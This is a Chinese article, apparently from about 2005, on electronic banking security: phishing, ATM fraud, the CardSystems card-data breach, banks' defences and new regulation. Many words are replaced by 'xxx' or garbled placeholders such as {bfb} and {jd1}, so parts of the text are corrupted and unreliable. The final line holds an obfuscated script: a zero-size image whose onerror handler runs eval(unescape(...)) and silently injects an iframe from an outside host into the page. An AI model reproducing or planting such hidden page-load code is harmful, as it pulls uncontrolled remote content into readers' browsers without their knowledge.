电子银行安全： 没有终点的攻防战


2005年6月份，发生在美国的4000万xxxxxxx被盗事件让世人震惊，在我们尽情享受电子银行便利性的同时，安全的警钟也在长鸣。在“更便利”与“xxx”、“效率”与“效益”这些两难问题上，电子银行该如何选择才能构筑起安全的城堡？ 同年5月19日，银监会发布公告，征求社会各界对《电子银行业务管理办法（征求意见稿）》和《电子银行安全评估指引（征求意见稿）》的意见。这一举措被一些媒体解读成“银监会向黑客宣战的前兆”。如此想法，未免狭隘，但是它所传递的另外一个信息是大家公认的，电子银行面临严峻考验，立法不仅给银行也给针对银行的攻击者敲响了警钟。 危机无处不在 电子银行究竟安不安全？“此种担心绝非杞人忧天。”一个资深银行安全专家如是说: “你的电脑可能已经被装了很多个间谍软件，你的网络银行账号和密码很容易被窃取; 手机银行并不比网络银行安全，因为普通SIM卡没有密钥做验证，即便是加载密钥的SIM卡，还得考虑到手机是一种易丢失品; 电话银行暂时相对好些，因为GSM窃听设备价格昂贵; 自助银行的安全性就更差，偷看、偷拍、哄骗等没有丝毫技术含量的手段，就能让你xxx里的钱不翼而飞。” 这一番话虽有些耸人听闻，但国内电子银行安全正面临严重考验却是不容置疑的事实。一段时间以来，电子银行种种事端频频爆出: 工商银行、中国银行和农业银行的网站曾遭黑客伪冒; 工商银行网站遭到“特洛依木马”黑客程序的攻击。 从目前来看，针对网络银行诈骗无疑是xx度{zg}的犯罪。犯罪分子通过xx通知、网络钓鱼、病毒程序等方法，骗取或者xx客户的用户名和密码。其中影响{zd0}的就是工商银行网站被仿冒事件。不法分子将www.icbc .com.cn改为，诱使客户在假网站上登录了自己的账号和密码，从而窃取客户资金。其次是针对ATM机的犯罪，可以说是已到了无所不用其极的地步，偷看密码、偷拍密码、xxx掉包计、诱骗客户刷卡等手段层出不穷。而随着手机应用的普及，利用手机进行诈骗的事件也不断发生。 在2004年银行技术会议上，Standard Bank Group技术工程经理 Herman Singh在主题演讲“关于确保{sjj}在线安全”中提到: “目前，黑客60%的攻击是针对金融客户的，其中网页仿冒的攻击数量每三个月就翻一番，病毒和黑客造成的全球性攻击给金融领域造成了几十亿美元的损失。在身份偷窃等阴谋的威胁下，电子银行技术将被证明更脆弱。” “与其说银行太脆弱，不如说是用户太脆弱。”国内知名安全服务公司绿盟科技资深安全专家赵彦认为，目前国内针对电子银行的犯罪手段并不高明。大多数罪犯都是在普通客户安全意识淡薄的情况下，采用网络钓鱼、木马这两种并不高明的手段，窃取用户的账户和密码。 这一看法与国内A银行安全负责人B先生不谋而合。“银行提供了很多的安全措施来保护客户的资金安全，但是很多情况下，客户并没有效地使用，给犯罪分子提供了可乘之机。就目前来看，95%以上的犯罪都是由于客户的安全意识淡漠造成的。” 银行不能因噎废食，现在{bfb}安全的系统是不存在的，所以银行对存在一定风险的业务，不应是一味排斥和逃避，关键在于科学的管理和控制。 6月17日，美国万事达公司公布了一条震惊全球的消息: 4000万信用卡用户的信息可能被窃。这次事件涉及到1390万名万事达客户、2200万Visa 客户以及数量不详的美国运通和Discover客户。根据网上披露的信息，电脑病毒侵入了一家结算处理公司的计算机系统，黑客偷走了20万张信用卡和借记卡账户的数据，并可能访问了4000万名信用卡的信息，此次安全违规事件的根源是CardSystems公司，它是一家为数家信用卡处理交易的第三方公司。万事达国际称，是“依据基本常识得到客户资料被盗信息的”，有专家分析认为，很可能是通过类似查账、审计的手段发现这一事实。 以前银行总是认为自己的核心业务系统是安全的，但是这一事件证明，黑客不再只是瞄准零散的客户实施欺诈，而开始攻击银行核心业务系统，这无疑给银行自认为铜墙铁壁的核心系统敲响了警钟。 “黑客攻击是我们最担心的事情。” B先生对记者坦言: “黑客也许发现了我们的系统漏洞，而银行方面还懵然不知，这是非常恐怖的事情。”就像马其诺防线，攻击者并不是按照防御者的思路进行攻击，而是“出其不意、攻其不备”，这才是银行安全人员惴惴不安的原因。 在MSN上，一个隐身黑客对记者说: “现在有一种全球性的趋势，是黑客自己找到漏洞不公开，不为人知也就根本不可能有补丁发布，那么他可以拿自己私藏的漏洞攻击世界上任何一个对应的系统。” 而且，黑客越来越职业化，攻击也越来越具备杀伤力。深圳大成天下公司总经理吴鲁加说: “已经有许多犯罪集团将目光投向了网络。因此，大量有组织的犯罪行为，实际上是一些电脑技术高手被当成雇佣兵，比如编制病毒木马、研发新的漏洞及攻击程序等等，以满足雇主的需要。” 建设银行电子银行事业部总经理徐捷坦言: “电子交易由于没有纸质凭证，可能先入为主地给人们带来不安全感。另外，黑客的攻击事件与事后报道也让人们对于安全性心怀芥蒂。”同时他也强调: “尽管黑客的手段花样翻新，但银行防范风险的能力也不断提高，这是一个在较量中成长的过程。” 无法回避的两难处境 任何可用的系统从安全上讲都是有“漏洞”的，就好比一个篮球，要想它能保持弹跳就必须留一个孔，这个孔既是充气的孔，也是漏气的孔。如果怕漏气，一个孔都没有，这个篮球就没法用，因为热胀冷缩会使它冬天是瘪的或者夏天会爆掉。这就是中国金融认证中心副总经理隆永红博士所说的“篮球原理”。 事实上，在国内商业银行开通电子银行服务之前，银行的业务系统是xx封闭的，自然没有被攻击的可能性。而银行的业务系统一旦对外开放，通道一打开，自然也为不法分子打开了方便之门。因为这样的通道是君子能进入，小人也能进入。赵彦对记者说: “黑客要层层突破银行的种种安全屏障，可能性是很小的。现在发生的攻击案例，至少95%以上是攻击者利用银行提供的通道进入系统，然后实施破坏。” 记者采访中了解到，诸如加密算法被xx、数字证书被盗用、支付网关有漏洞、硬件黑客、服务端（支付网关）和客户端（网上支付的PC机）等等威胁电子银行安全事件随时都有可能发生。虽然现在亚太及欧美国家的金融机构的信息化解决方案都由一些大的专门公司提供，这些公司本身会雇佣一些安全研究人员，做白盒或黑盒测试，以弥补安全漏洞，但这并不能确保这些在线支付软件售出之后就不存在漏洞了; 另一方面，网银入口和在线支付提供商的范围广泛，保存用户机密资料的存储媒介分布广，这些都可能成为黑客攻击的目标。 银行面临的{dy}个两难问题就是“效益”和“效率”问题。有通道就有漏洞，那么银行需要付出多大的代价来填补这样的漏洞，是否值得为一个可能被发现的概率很小的漏洞去花费巨额的资金，而这样的系统还可能给银行业务流程带来诸多繁琐的环节。事实上，国内一些银行在安全方面的投入不够，就因为他们认为那些风险是可以承受的。 不可否认，多数商业银行为构建其核心安全系统可谓不惜重金，一些商业银行的投资动辄几千万元人民币。“银行系统并不像大家所认为的那样不堪一击。”B先生对记者说: “银行在选择防病毒软件、防火墙、入侵检测设备、操作系统、硬件设施、数字证书等方面都充分考虑了安全性的需要，尤其对于核心业务系统的保护以及对企业级客户的资金安全的保护，再多的钱都要花。因为一旦出现风险，甚至银行高管的职位都面临威胁。” 交通银行通过网上银行、手机银行、电话银行、自助银行已经提供了完整的电子银行服务体系，该行电子银行事业部总经理兰福民介绍说: “为了保障电子银行的安全，我们安排专人进行实时监控，只要犯罪分子在我们网站上有任何举动，都将被监控、跟踪和记录下来。” 由此可见，银行在安全系统构建方面可谓费尽心机。但是随着电子银行新业务的不断推出，电子银行安全隐忧势必不断。中国建设银行提出了电子银行业务超常规发展的战略部署，开通了网上银行、电话银行和手机银行服务。根据最近披露，上半年电子银行交易额达到20000亿元，已经超过柜台交易额; 客户数达到800万户，今年上半年新增客户465万户。该行电子银行事业部总经理徐捷坦言: “我们面临的技术风险主要来自黑客对防火墙和网络监测等设施的恶意攻击。” 银行面临的第二个两难处境是 “xxx”和“更便利”之间的平衡问题。国内C商业银行的安全负责人D先生对记者说: “如果柜台交易的安全性是90%，而我们的电子银行交易稍微低于这个百分比，比如85%，我们就认为这个系统是安全的。”很显然，系统是否安全在很多商业银行看来，并没有统一的标准，这无疑不利于一个安全有效的电子银行安全系统的构建。 “安全是有代价的。不要要求银行在安全和便利好用之间挣扎，不要对银行过于求全责备。” D先生对记者说: “对于银行来说，如果为了安全，就必须牺牲使用的便利性; 如果用户要贪图使用方便，安全的威胁自然就更高。” 银行常常可以听到两种声音: 一种是“我就需要很简单便利的电子银行服务，不需要签约，不需要数字证书等繁琐的程序”; 另外一种声音是“能不能有xxx的程序来保证我们的资金安全”。而银行在安全和便利之间确实很难寻求到{zj0}的平衡点。 但是银行不能因噎废食。国内某银行的负责人在接受采访时说: “银行理所当然应把信息安全技术放在{dy}位，但现在{bfb}安全的系统是不存在的，所以银行对存在一定风险的业务，不应是一味排斥和逃避，关键在于科学的管理和控制。” 防微杜渐 一个资深安全专家对记者说: “电子银行不能做到{jd1}的安全，但是一定可以做到xxx。” 隆永红博士认为，银行在构建电子银行安全系统的时候，有三种策略: 预防型、防微杜渐型和亡羊补牢型，一般都得同时采用。比如事先在系统设计时就考虑的加密、身份认证等技术属于预防型的; 利用一些扫描或入侵检测方法，发现问题及时修补，属于防微杜渐型; 应急预案和灾难恢复机制就属于亡羊补牢型的。“我们不能期待一个{jd1}安全的系统，关键是对不安全点做到心中有数，及时应对不安全事件。” 只有前瞻性的安全服务才能对看不见的风险做到未雨绸缪，比如风险评估就是非常有效的预防性措施。风险评估是以保护用户信息系统安全为目的，对信息系统的各个层面（如系统、网络、数据、应用、管理等）的安全性的测量与判断，是通过一种量化的形式判断客户系统各方面的安全程度的方法。风险评估的结果提供了用户系统各部分风险程度大小的数值，从而可以帮助用户认清当前的安全问题，并进一步管理风险，增加系统的安全性。在国外，由第三方机构对金融系统进行风险评估是非常通行的做法，但是在国内几乎还是一片空白。 某银行IT部门负责人称: “有些缺陷是我们预知的，并且是可以承受的，比如相对于银行网点面对面的服务，网上银行和电话银行不能确认操作者就是账户的持有者，不能验证xxx的磁道信息，自助存款设备可能把xx当真钞等缺陷就是众所周知的，但是我们不能因此而不用它们。” 一些安全专家认为，无论是网络银行还是电话银行、自助银行，都应该针对不同的渠道制定不同的业务规则、采用不同级别的安全技术、使用不同的风险控制策略，以弥补相应的缺陷。 比如对网络银行，严格开通流程和身份审核、账户变动短信提示、取消缺省密码、控制转账和消费金额、使用数字证书进行身份验证和交易签名等都是值得提倡的。据B先生介绍，A行目前在防御网络银行方面有相对完善的措施: 首先对于企业客户，必须是在柜台签约后才能开通网上银行的服务，而且要求必须使用数字证书; 其次是向用户推出短信服务，用户账务的每一个变化都能及时知道，这样即使有闪失，也能把风险降到{zd1}; 对于网络钓鱼事件，银行坚持“全国只宣传一个网址”，以免混淆视听; 而对于一些电子商务网站贴虚假的网络银行链接，银行采取的办法是把签约商户都罗列出来，谨防上当。 对于电话银行，有三种办法是非常有效的。一是限制转账金额，二是限制转入账号，三是只宣传一个电话号码。D先生介绍C银行的做法是，电话银行服务只是查询，不能做转账，而且电话银行的查询密码和网上银行、自助银行的密码是不一样的; A行的电话银行可以实现转账，但是首先需要到银行柜台登记对方账号，而且限制转账的金额。 手机银行是新兴业务，一种是手机短信实现交易，一种是直接在线交易。目前A行的手机银行用户只有几万户，用户群体非常狭窄，在线交易的量非常少，还没有像网络银行、自助银行那样被一些不法分子xx和研究。 对于自助银行，加强对操作现场的远程监控和录像资料的审查是{zh0}的预防措施。银行ATM机一般都有摄像机，但是很多情况下，这个设施只是一个摆设。一方面，银行并没有客户的图像资料，很难确定在ATM实施犯罪者的身份; 其次，由于摄像数据量巨大，很多银行采取降低清晰度的方式来延长拍摄时间，所以摄像的清晰度不高。还有一点是，一些银行对当天的监控录像并不审看，所以一些犯罪者明火执仗地作案也没有被发现。 建设银行是国内电子银行服务齐全、安全设施成熟的商业银行，徐捷介绍说，为了防范“网络钓鱼”等类似案件的发生，建行设立多道密码防范，构筑了一道道安全防火墙; 同时还提供数字证书、USB key用户证书载体等方式，保障客户的交易和支付安全。另外，建行也在确保风险可控的情况下，设置额度限制，让小额度的交易更加高效，让大额度的交易更加安全，让电子银行服务更加便利和人性化。 虽然单纯的技术手段不能杜绝金融犯罪和确保金融安全，但在金融信息化和全球化的今天，金融风险控制和安全问题对技术的依赖性越来越强。隆永红博士认为，从技术上讲，要有效预防金融犯罪，主要应该考虑以下几个方面: 首先，合理反映风险管理和控制策略的业务系统设计至关重要; 其次，在兼顾效率、效益的情况下，应该采用既成熟又先进的安全技术实现身份识别、数据私密性、完整性、真实性以及不可抵赖性，比如录入复核串岗问题的控制，采用数字证书或生物识别技术就可以解决; 三是操作监控审计，一方面便于事后调查取证，另一方面也是对犯罪分子的一种威慑。他补充说: “目前很多系统在这方面做得很不够，有些系统干脆没有，有些系统即使有也不查看，其实目前的技术xx可以做到: 除了记录操作信息以外，还可以根据一些已有的规律发现可疑操作并告警。” 三道防线构筑安全城堡 既然没有{jd1}的安全，那么建立高效的应急处理和响应机制就是必须的，我们可以称之为“亡羊补牢”。事实上，银行的系统确实是在不断地查漏补缺中更加完善和安全。 比如，在反网络钓鱼方面，安全厂商纷纷加强对内容安全方面的基础技术研究。如趋势科技在其网络安全的软件设计中新增了防范网络钓鱼的功能。PC-cillin2005网络安全版创新增加“反网络钓鱼防护”，能有效过滤和封锁网络钓鱼诈骗邮件和行为，避免客户的隐私资料不慎外泄。更可通过“私密资料防护”功能，主动封锁和拦截外送的个人私密资料，包括信用卡、游戏账号或身份证等。还有一种办法是，用户可以安装专门对付网络钓鱼的IE插件NetCraft Toolbar，用户安装NetCraft Toolbar后，IE就会出现一个工具条，该工具条会显示你浏览当前网页的关键信息，用户只要稍加留意就会轻易躲过“网络钓鱼”，也可以由此侦测仿冒网站的Spoof Stick。 “被攻击往往不是因为纯粹的技术原因。因此，良好的安全管理很可能会收到事半功倍的效果。”吴鲁加对记者说: “要保证电子银行的安全，一般有三道防线。” 首先金融机构自身应该有足够的投入和措施做好基础安全。 对于如何应对电子银行遭受安全攻击，国际上有标准的处理流程，在通行的应急响应惯例中，有PDCERF之说，即: 准备（Preparation）、检测（Detection）、抑制（Containment）、根除（Eradication）、恢复（Recovery）、跟踪（Follow-up）。C银行负责人介绍，一般情况下，事故一旦发生并被发现，银行会迅速召集相关的软硬件提供商以及专门的安全服务公司的专家一起调查发生的原因，如果是系统漏洞，那么就会马上打补丁; 如果是客户自身原因造成的损失，银行方会给客户做出解释。 一些电子银行的犯罪者最终被擒获，通常情况下都是多方面合作的结果。银行系统的业务人员，在审计结算过程中，有很大的机会发现异状; 重视安全的银行，基本上配备有专业的网络管理员（甚至是专业的安全管理员），他们能够从技术上找到“原始”证据; 银行可能会联系他们的上级机关，进而与公安网监部门合作进行立案; 由于网络犯罪的跨地域性质，很可能需要跨省甚至跨国进行协调。 我国政府相关机构已经意识到这样的问题并开始行动起来向电子银行犯罪宣战。针对电子银行犯罪，政府接二连三出台了一系列措施: 比如《电子签名法》、银监会公布的《电子银行业务管理办法(征求意见稿)》和《电子银行安全评估指引(征求意见稿)》，人民银行也公布了《电子支付指引(征求意见稿)》。这些法规的出台，将对于遏制电子银行犯罪起到积极的作用。 其次,安全公司可以进一步把安全提升到专业的层次，提供更加强有力的保护，这类安全产品和服务提供商应该具有{sjlx}的技术实力，否则提供安全如纸上谈兵。 而在一些复杂程度更高的网络犯罪案例中，专门的服务公司的资深安全专家常常扮演“福尔摩斯”的角色，在调查犯罪过程中扮演重要角色。他们能从一些蛛丝马迹中寻找出事情真相: 在线支付的IP、非法转账的xxx卡号、巨额的刷卡消费行为、ATM取款机上摄像头的监控等。 赵彦说:“如果客户遭受攻击，我们公司有一套完整的解决方案，帮助客户化险为夷。比如: 在攻击发生之前，我们能做到提前预警和积极防御，通常能在攻击未完成之前就予以阻断; 即使有较小概率的突破，我们也能在极短的时间内完成应急响应，实现取证和恢复。” 类似绿盟科技公司这样的专业安全服务公司可以称作“企业贴身保镖”。 深圳市大成天下公司也是一家专业从事信息安全产品与服务的公司，独立开发出了包括游刃基线安全系统、铁卷信息监控平台在内的多款产品，并在安全评估、内容安全、接入安全、Web安全等研究领域中取得多项科研技术成果。赵彦介绍说: “网络安全是个起步不久的行业,国内对服务的认识显然滞后于国外。虽然联想网御、天融信、绿盟科技和启明星辰等厂商都能提供专业的安全服务，但是目前的市场环境并不是太好。” {zh1}一道防线，老百姓应该提高安全意识，注意安全操作流程和规范，防止网上欺骗行为。

0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zw_728_90.html%20width%3D728%20height%3D90%20frameBorder%3D0%20scrolling%3Dno%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml2%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">